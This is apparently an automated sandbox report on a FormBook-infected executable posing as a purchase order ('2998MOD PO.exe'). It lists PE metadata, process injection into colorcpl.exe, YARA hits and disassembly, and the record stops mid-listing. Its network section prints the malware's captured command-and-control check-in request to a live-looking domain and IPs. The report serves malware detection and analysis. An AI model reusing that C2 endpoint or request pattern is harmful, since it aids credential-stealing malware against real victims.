                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Time Stamp:0x671899DE [Wed Oct 23 06:38:22 2024 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:4
                        OS Version Minor:0
                        File Version Major:4
                        File Version Minor:0
                        Subsystem Version Major:4
                        Subsystem Version Minor:0
                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                        Entrypoint Preview

                        Instruction
                        jmp dword ptr [00402000h]
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al

                        Data Directories

                        NameVirtual AddressVirtual Size Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IMPORT0xc98c20x4f.text
                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xca0000x63c.rsrc
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                        IMAGE_DIRECTORY_ENTRY_BASERELOC0xcc0000xc.reloc
                        IMAGE_DIRECTORY_ENTRY_DEBUG0xc62bc0x54.text
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                        Sections

                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                        .text0x20000xc791c0xc7a002a8bf27d26ded997f90668bac1c340b1False0.8597113239668128data7.708866164549466IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        .rsrc0xca0000x63c0x8009277d6ded9ab294ca2ea65872bd6de42False0.33935546875data3.487520827190203IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .reloc0xcc0000xc0x20096ac322b43fbaf6ea4e942fb2e71fe19False0.044921875data0.09800417566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                        Resources

                        NameRVASizeTypeLanguageCountryZLIB Complexity
                        RT_VERSION0xca0900x3acdata0.4148936170212766
                        RT_MANIFEST0xca44c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                        Imports

                        DLLImport
                        mscoree.dll_CorExeMain

                        Network Behavior

                        Suricata IDS Alerts

                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                        2024-10-25T22:10:39.644215+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.4497413.33.130.19080TCP

                        Network Port Distribution

                        TCP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Oct 25, 2024 22:10:38.993120909 CEST4974180192.168.2.43.33.130.190
                        Oct 25, 2024 22:10:38.999243021 CEST80497413.33.130.190192.168.2.4
                        Oct 25, 2024 22:10:38.999429941 CEST4974180192.168.2.43.33.130.190
                        Oct 25, 2024 22:10:39.006668091 CEST4974180192.168.2.43.33.130.190
                        Oct 25, 2024 22:10:39.012780905 CEST80497413.33.130.190192.168.2.4
                        Oct 25, 2024 22:10:39.643582106 CEST80497413.33.130.190192.168.2.4
                        Oct 25, 2024 22:10:39.644032955 CEST80497413.33.130.190192.168.2.4
                        Oct 25, 2024 22:10:39.644215107 CEST4974180192.168.2.43.33.130.190
                        Oct 25, 2024 22:10:39.647439003 CEST4974180192.168.2.43.33.130.190
                        Oct 25, 2024 22:10:39.653175116 CEST80497413.33.130.190192.168.2.4

                        UDP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Oct 25, 2024 22:10:38.961756945 CEST5113453192.168.2.41.1.1.1
                        Oct 25, 2024 22:10:38.987521887 CEST53511341.1.1.1192.168.2.4

                        DNS Queries

                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                        Oct 25, 2024 22:10:38.961756945 CEST192.168.2.41.1.1.10x8180Standard query (0)www.ladylawher.orgA (IP address)IN (0x0001)false

                        DNS Answers

                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                        Oct 25, 2024 22:10:38.987521887 CEST1.1.1.1192.168.2.40x8180No error (0)www.ladylawher.orgladylawher.orgCNAME (Canonical name)IN (0x0001)false
                        Oct 25, 2024 22:10:38.987521887 CEST1.1.1.1192.168.2.40x8180No error (0)ladylawher.org3.33.130.190A (IP address)IN (0x0001)false
                        Oct 25, 2024 22:10:38.987521887 CEST1.1.1.1192.168.2.40x8180No error (0)ladylawher.org15.197.148.33A (IP address)IN (0x0001)false

                        HTTP Request Dependency Graph

                        • www.ladylawher.org

                        HTTP Packets

                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        0192.168.2.4497413.33.130.190803496C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exe
                        TimestampBytes transferredDirectionData
                        Oct 25, 2024 22:10:39.006668091 CEST460OUTGET /up8i/?Ax=9lO0gd2hrt6dKrz&1b80hL3=FonQAt5G6G0h5a/xcW34pfv7cxcrms3RfG5nxPFgUs1csnhs+lBXewxt89Cj5Voixu7jLVxWB2hHsNPmnpQdsR1nmqFV7MzuwwVkSFycHqtReIUzDRqobl4= HTTP/1.1
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                        Accept-Language: en-US,en;q=0.5
                        Connection: close
                        Host: www.ladylawher.org
                        User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                        Oct 25, 2024 22:10:39.643582106 CEST402INHTTP/1.1 200 OK
                        Server: openresty
                        Date: Fri, 25 Oct 2024 20:10:39 GMT
                        Content-Type: text/html
                        Content-Length: 262
                        Connection: close
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 41 78 3d 39 6c 4f 30 67 64 32 68 72 74 36 64 4b 72 7a 26 31 62 38 30 68 4c 33 3d 46 6f 6e 51 41 74 35 47 36 47 30 68 35 61 2f 78 63 57 33 34 70 66 76 37 63 78 63 72 6d 73 33 52 66 47 35 6e 78 50 46 67 55 73 31 63 73 6e 68 73 2b 6c 42 58 65 77 78 74 38 39 43 6a 35 56 6f 69 78 75 37 6a 4c 56 78 57 42 32 68 48 73 4e 50 6d 6e 70 51 64 73 52 31 6e 6d 71 46 56 37 4d 7a 75 77 77 56 6b 53 46 79 63 48 71 74 52 65 49 55 7a 44 52 71 6f 62 6c 34 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Ax=9lO0gd2hrt6dKrz&1b80hL3=FonQAt5G6G0h5a/xcW34pfv7cxcrms3RfG5nxPFgUs1csnhs+lBXewxt89Cj5Voixu7jLVxWB2hHsNPmnpQdsR1nmqFV7MzuwwVkSFycHqtReIUzDRqobl4="}</script></head></html>


                        Statistics

                        CPU Usage

                        Click to jump to process

                        Memory Usage

                        Click to jump to process

                        High Level Behavior Distribution

                        Click to dive into process behavior distribution

                        Behavior

                        Click to jump to process

                        System Behavior

                        General

                        Target ID:0
                        Start time:16:09:51
                        Start date:25/10/2024
                        Path:C:\Users\user\Desktop\2998MOD PO.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\2998MOD PO.exe"
                        Imagebase:0x760000
                        File size:820'736 bytes
                        MD5 hash:EBA2ADE6A60568538D8B918F65FA2F44
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:true

                        General

                        Target ID:3
                        Start time:16:10:06
                        Start date:25/10/2024
                        Path:C:\Users\user\Desktop\2998MOD PO.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Users\user\Desktop\2998MOD PO.exe"
                        Imagebase:0x50000
                        File size:820'736 bytes
                        MD5 hash:EBA2ADE6A60568538D8B918F65FA2F44
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:true

                        General

                        Target ID:4
                        Start time:16:10:06
                        Start date:25/10/2024
                        Path:C:\Users\user\Desktop\2998MOD PO.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\2998MOD PO.exe"
                        Imagebase:0xe30000
                        File size:820'736 bytes
                        MD5 hash:EBA2ADE6A60568538D8B918F65FA2F44
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2041194663.00000000018F0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2040454369.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2042765684.0000000001E20000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                        Reputation:low
                        Has exited:true

                        General

                        Target ID:7
                        Start time:16:10:16
                        Start date:25/10/2024
                        Path:C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exe"
                        Imagebase:0xdb0000
                        File size:140'800 bytes
                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3560962985.0000000002F60000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                        Reputation:high
                        Has exited:false

                        General

                        Target ID:8
                        Start time:16:10:19
                        Start date:25/10/2024
                        Path:C:\Windows\SysWOW64\colorcpl.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\SysWOW64\colorcpl.exe"
                        Imagebase:0xa00000
                        File size:86'528 bytes
                        MD5 hash:DB71E132EBF1FEB6E93E8A2A0F0C903D
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2288704216.0000000004A40000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2288668245.00000000049F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:moderate
                        Has exited:true

                        General

                        Target ID:9
                        Start time:16:10:32
                        Start date:25/10/2024
                        Path:C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exe"
                        Imagebase:0xdb0000
                        File size:140'800 bytes
                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3564602723.0000000004DF0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                        Reputation:high
                        Has exited:false

                        General

                        Target ID:10
                        Start time:16:10:44
                        Start date:25/10/2024
                        Path:C:\Program Files\Mozilla Firefox\firefox.exe
                        Wow64 process (32bit):
                        Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                        Imagebase:
                        File size:676'768 bytes
                        MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:false

                        Disassembly

                        Reset < >

                          Execution Graph

                          Execution Coverage:7.5%
                          Dynamic/Decrypted Code Coverage:100%
                          Signature Coverage:0%
                          Total number of Nodes:44
                          Total number of Limit Nodes:9
                          execution_graph 20732 56464f0 20733 564667b 20732->20733 20735 5646516 20732->20735 20735->20733 20736 5643f88 20735->20736 20737 5646770 PostMessageW 20736->20737 20738 56467dc 20737->20738 20738->20735 20716 117d6d0 DuplicateHandle 20717 117d766 20716->20717 20718 117acf0 20722 117add9 20718->20722 20727 117ade8 20718->20727 20719 117acff 20723 117ae1c 20722->20723 20724 117adf9 20722->20724 20723->20719 20724->20723 20725 117b020 GetModuleHandleW 20724->20725 20726 117b04d 20725->20726 20726->20719 20728 117ae1c 20727->20728 20729 117adf9 20727->20729 20728->20719 20729->20728 20730 117b020 GetModuleHandleW 20729->20730 20731 117b04d 20730->20731 20731->20719 20739 117d080 20740 117d0c6 GetCurrentProcess 20739->20740 20742 117d111 20740->20742 20743 117d118 GetCurrentThread 20740->20743 20742->20743 20744 117d155 GetCurrentProcess 20743->20744 20745 117d14e 20743->20745 20746 117d18b 20744->20746 20745->20744 20747 117d1b3 GetCurrentThreadId 20746->20747 20748 117d1e4 20747->20748 20749 1174668 20750 117467a 20749->20750 20751 1174686 20750->20751 20753 1174779 20750->20753 20754 117479d 20753->20754 20758 1174878 20754->20758 20762 1174888 20754->20762 20760 11748af 20758->20760 20759 117498c 20759->20759 20760->20759 20766 11744b4 20760->20766 20764 11748af 20762->20764 20763 117498c 20763->20763 20764->20763 20765 11744b4 CreateActCtxA 20764->20765 20765->20763 20767 1175918 CreateActCtxA 20766->20767 20769 11759db 20767->20769

                          Executed Functions

                          Function 0117D070 Relevance: 6.1, APIs: 4, Instructions: 130threadCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 294 117d070-117d10f GetCurrentProcess 298 117d111-117d117 294->298 299 117d118-117d14c GetCurrentThread 294->299 298->299 300 117d155-117d189 GetCurrentProcess 299->300 301 117d14e-117d154 299->301 302 117d192-117d1ad call 117d658 300->302 303 117d18b-117d191 300->303 301->300 307 117d1b3-117d1e2 GetCurrentThreadId 302->307 303->302 308 117d1e4-117d1ea 307->308 309 117d1eb-117d24d 307->309 308->309
                          APIs
                          • GetCurrentProcess.KERNEL32 ref: 0117D0FE
                          • GetCurrentThread.KERNEL32 ref: 0117D13B
                          • GetCurrentProcess.KERNEL32 ref: 0117D178
                          • GetCurrentThreadId.KERNEL32 ref: 0117D1D1
                          Memory Dump Source
                          • Source File: 00000000.00000002.1862940170.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1170000_2998MOD PO.jbxd
                          Similarity
                          • API ID: Current$ProcessThread
                          • String ID:
                          • API String ID: 2063062207-0
                          • Opcode ID: 7ffc520767d9da7581e2f6b81fa93e2a94c27a323474b6b9b57a24d4404d0253
                          • Instruction ID: 7988ee3d1f80a128a131971cde47b19c9e5afb721ddfa78c53a73a8ec35efbf9
                          • Opcode Fuzzy Hash: 7ffc520767d9da7581e2f6b81fa93e2a94c27a323474b6b9b57a24d4404d0253
                          • Instruction Fuzzy Hash: BC5174B09003098FDB08CFA9E948BDEBFF5AF48304F24C469E419A7360DB749984CB65
                          Function 0117D080 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 316 117d080-117d10f GetCurrentProcess 320 117d111-117d117 316->320 321 117d118-117d14c GetCurrentThread 316->321 320->321 322 117d155-117d189 GetCurrentProcess 321->322 323 117d14e-117d154 321->323 324 117d192-117d1ad call 117d658 322->324 325 117d18b-117d191 322->325 323->322 329 117d1b3-117d1e2 GetCurrentThreadId 324->329 325->324 330 117d1e4-117d1ea 329->330 331 117d1eb-117d24d 329->331 330->331
                          APIs
                          • GetCurrentProcess.KERNEL32 ref: 0117D0FE
                          • GetCurrentThread.KERNEL32 ref: 0117D13B
                          • GetCurrentProcess.KERNEL32 ref: 0117D178
                          • GetCurrentThreadId.KERNEL32 ref: 0117D1D1
                          Memory Dump Source
                          • Source File: 00000000.00000002.1862940170.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1170000_2998MOD PO.jbxd
                          Similarity
                          • API ID: Current$ProcessThread
                          • String ID:
                          • API String ID: 2063062207-0
                          • Opcode ID: 1c4fc29942c13df86f62bead4a3a2104d94cf3ccd47ff485567bcedc1ca2a83b
                          • Instruction ID: 8b7cbe53d083f1342265d83a990b2abc9b0deff2914303cdbd7f3c230591284e
                          • Opcode Fuzzy Hash: 1c4fc29942c13df86f62bead4a3a2104d94cf3ccd47ff485567bcedc1ca2a83b
                          • Instruction Fuzzy Hash: B75155B09013098FDB08DFA9E548BDEBFF5AF88314F20C459E409A7360DB749984CB65
                          Function 0117ADE8 Relevance: 1.7, APIs: 1, Instructions: 195COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 361 117ade8-117adf7 362 117ae23-117ae27 361->362 363 117adf9-117ae06 call 117a10c 361->363 364 117ae3b-117ae7c 362->364 365 117ae29-117ae33 362->365 368 117ae1c 363->368 369 117ae08 363->369 372 117ae7e-117ae86 364->372 373 117ae89-117ae97 364->373 365->364 368->362 418 117ae0e call 117b071 369->418 419 117ae0e call 117b080 369->419 372->373 375 117aebb-117aebd 373->375 376 117ae99-117ae9e 373->376 374 117ae14-117ae16 374->368 378 117af58-117af6f 374->378 377 117aec0-117aec7 375->377 379 117aea0-117aea7 call 117a118 376->379 380 117aea9 376->380 383 117aed4-117aedb 377->383 384 117aec9-117aed1 377->384 394 117af71-117afd0 378->394 382 117aeab-117aeb9 379->382 380->382 382->377 386 117aedd-117aee5 383->386 387 117aee8-117aef1 call 117a128 383->387 384->383 386->387 392 117aef3-117aefb 387->392 393 117aefe-117af03 387->393 392->393 395 117af05-117af0c 393->395 396 117af21-117af2e 393->396 412 117afd2-117b018 394->412 395->396 398 117af0e-117af1e call 117a138 call 117a148 395->398 401 117af51-117af57 396->401 402 117af30-117af4e 396->402 398->396 402->401 413 117b020-117b04b GetModuleHandleW 412->413 414 117b01a-117b01d 412->414 415 117b054-117b068 413->415 416 117b04d-117b053 413->416 414->413 416->415 418->374 419->374
                          APIs
                          • GetModuleHandleW.KERNELBASE(00000000), ref: 0117B03E
                          Memory Dump Source
                          • Source File: 00000000.00000002.1862940170.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1170000_2998MOD PO.jbxd
                          Similarity
                          • API ID: HandleModule
                          • String ID:
                          • API String ID: 4139908857-0
                          • Opcode ID: e499e602db390c59467129f5a1d96b6a871fab78489fc55f2c7911cb9e918853
                          • Instruction ID: 1c419cb6ee4ac5f46c871334d4e53f76dc741d9ba7b12d48046dc561a1c299d0
                          • Opcode Fuzzy Hash: e499e602db390c59467129f5a1d96b6a871fab78489fc55f2c7911cb9e918853
                          • Instruction Fuzzy Hash: 5F7134B0A00B058FE729DF29E44575ABBF5FF88304F048A29D08AD7B50DB35E946CB95
                          Function 011744B4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 420 11744b4-11759d9 CreateActCtxA 423 11759e2-1175a3c 420->423 424 11759db-11759e1 420->424 431 1175a3e-1175a41 423->431 432 1175a4b-1175a4f 423->432 424->423 431->432 433 1175a51-1175a5d 432->433 434 1175a60 432->434 433->434 436 1175a61 434->436 436->436
                          APIs
                          • CreateActCtxA.KERNEL32(?), ref: 011759C9
                          Memory Dump Source
                          • Source File: 00000000.00000002.1862940170.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1170000_2998MOD PO.jbxd
                          Similarity
                          • API ID: Create
                          • String ID:
                          • API String ID: 2289755597-0
                          • Opcode ID: 9f74f177f991115e67eca055405108cf75498a9ba0ea3eda087ce7d9cf3b53ab
                          • Instruction ID: accddd6d18e0135e811f21101de493bd81b51f0aa14857e6910bffd0ce1ff95c
                          • Opcode Fuzzy Hash: 9f74f177f991115e67eca055405108cf75498a9ba0ea3eda087ce7d9cf3b53ab
                          • Instruction Fuzzy Hash: 8941F2B0C0071DDBDB28DFA9C884BDDBBB6BF49304F20806AD408AB251DB756945CF90
                          Function 0117590C Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 437 117590c-1175913 438 117591c-11759d9 CreateActCtxA 437->438 440 11759e2-1175a3c 438->440 441 11759db-11759e1 438->441 448 1175a3e-1175a41 440->448 449 1175a4b-1175a4f 440->449 441->440 448->449 450 1175a51-1175a5d 449->450 451 1175a60 449->451 450->451 453 1175a61 451->453 453->453
                          APIs
                          • CreateActCtxA.KERNEL32(?), ref: 011759C9
                          Memory Dump Source
                          • Source File: 00000000.00000002.1862940170.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1170000_2998MOD PO.jbxd
                          Similarity
                          • API ID: Create
                          • String ID:
                          • API String ID: 2289755597-0
                          • Opcode ID: 5c696cab11aa6169b4ce1e373a14b50fd0e8f723a27856c3c7521093aea60263
                          • Instruction ID: 4555fdb8339bb8899f1f602a6cf3b69b63e2b7f74b7dd4fc1a572093acec9844
                          • Opcode Fuzzy Hash: 5c696cab11aa6169b4ce1e373a14b50fd0e8f723a27856c3c7521093aea60263
                          • Instruction Fuzzy Hash: BA41E2B1C00719CFDB28DFA9C8857CDBBB6BF49304F64806AD408AB255DB756985CF90
                          Function 0117D6C8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 454 117d6c8-117d764 DuplicateHandle 455 117d766-117d76c 454->455 456 117d76d-117d78a 454->456 455->456
                          APIs
                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0117D757
                          Memory Dump Source
                          • Source File: 00000000.00000002.1862940170.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1170000_2998MOD PO.jbxd
                          Similarity
                          • API ID: DuplicateHandle
                          • String ID:
                          • API String ID: 3793708945-0
                          • Opcode ID: 99bc46f7cc900a5bdd6b4e455613aec79a87d85f07bcbde9c0aac928106710a6
                          • Instruction ID: e4c8913203f88d11729e5b77a2724fc745d52da5bfafa24cbb9246a69880d3d5
                          • Opcode Fuzzy Hash: 99bc46f7cc900a5bdd6b4e455613aec79a87d85f07bcbde9c0aac928106710a6
                          • Instruction Fuzzy Hash: A321E0B59002489FDB10CFAAD984AEEBFF5EB48310F14841AE958B7310D374A954CFA5
                          Function 0117D6D0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 459 117d6d0-117d764 DuplicateHandle 460 117d766-117d76c 459->460 461 117d76d-117d78a 459->461 460->461
                          APIs
                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0117D757
                          Memory Dump Source
                          • Source File: 00000000.00000002.1862940170.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1170000_2998MOD PO.jbxd
                          Similarity
                          • API ID: DuplicateHandle
                          • String ID:
                          • API String ID: 3793708945-0
                          • Opcode ID: 7fb8ebaecad05235aca3538d64aad39dba590765272505df1f38ee6cbb13bf59
                          • Instruction ID: 4b9a367009a3b471f3f0336dc5cf4917ac43635c00675019d0b3d5521eb25fd6
                          • Opcode Fuzzy Hash: 7fb8ebaecad05235aca3538d64aad39dba590765272505df1f38ee6cbb13bf59
                          • Instruction Fuzzy Hash: 1221E0B59002489FDB10CFAAD984ADEFBF8EB48320F14841AE958B3310D374A944CFA5
                          Function 0117AFD8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 464 117afd8-117b018 465 117b020-117b04b GetModuleHandleW 464->465 466 117b01a-117b01d 464->466 467 117b054-117b068 465->467 468 117b04d-117b053 465->468 466->465 468->467
                          APIs
                          • GetModuleHandleW.KERNELBASE(00000000), ref: 0117B03E
                          Memory Dump Source
                          • Source File: 00000000.00000002.1862940170.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1170000_2998MOD PO.jbxd
                          Similarity
                          • API ID: HandleModule
                          • String ID:
                          • API String ID: 4139908857-0
                          • Opcode ID: c06c479c74de0b39a2b43be4fb5dbbc531d116ab0822be306599ea730891e9c8
                          • Instruction ID: 7d2cf34663368bc3bf08150ecdc018a99a0d8f52b9f45cfffb4e7bab08e25d4b
                          • Opcode Fuzzy Hash: c06c479c74de0b39a2b43be4fb5dbbc531d116ab0822be306599ea730891e9c8
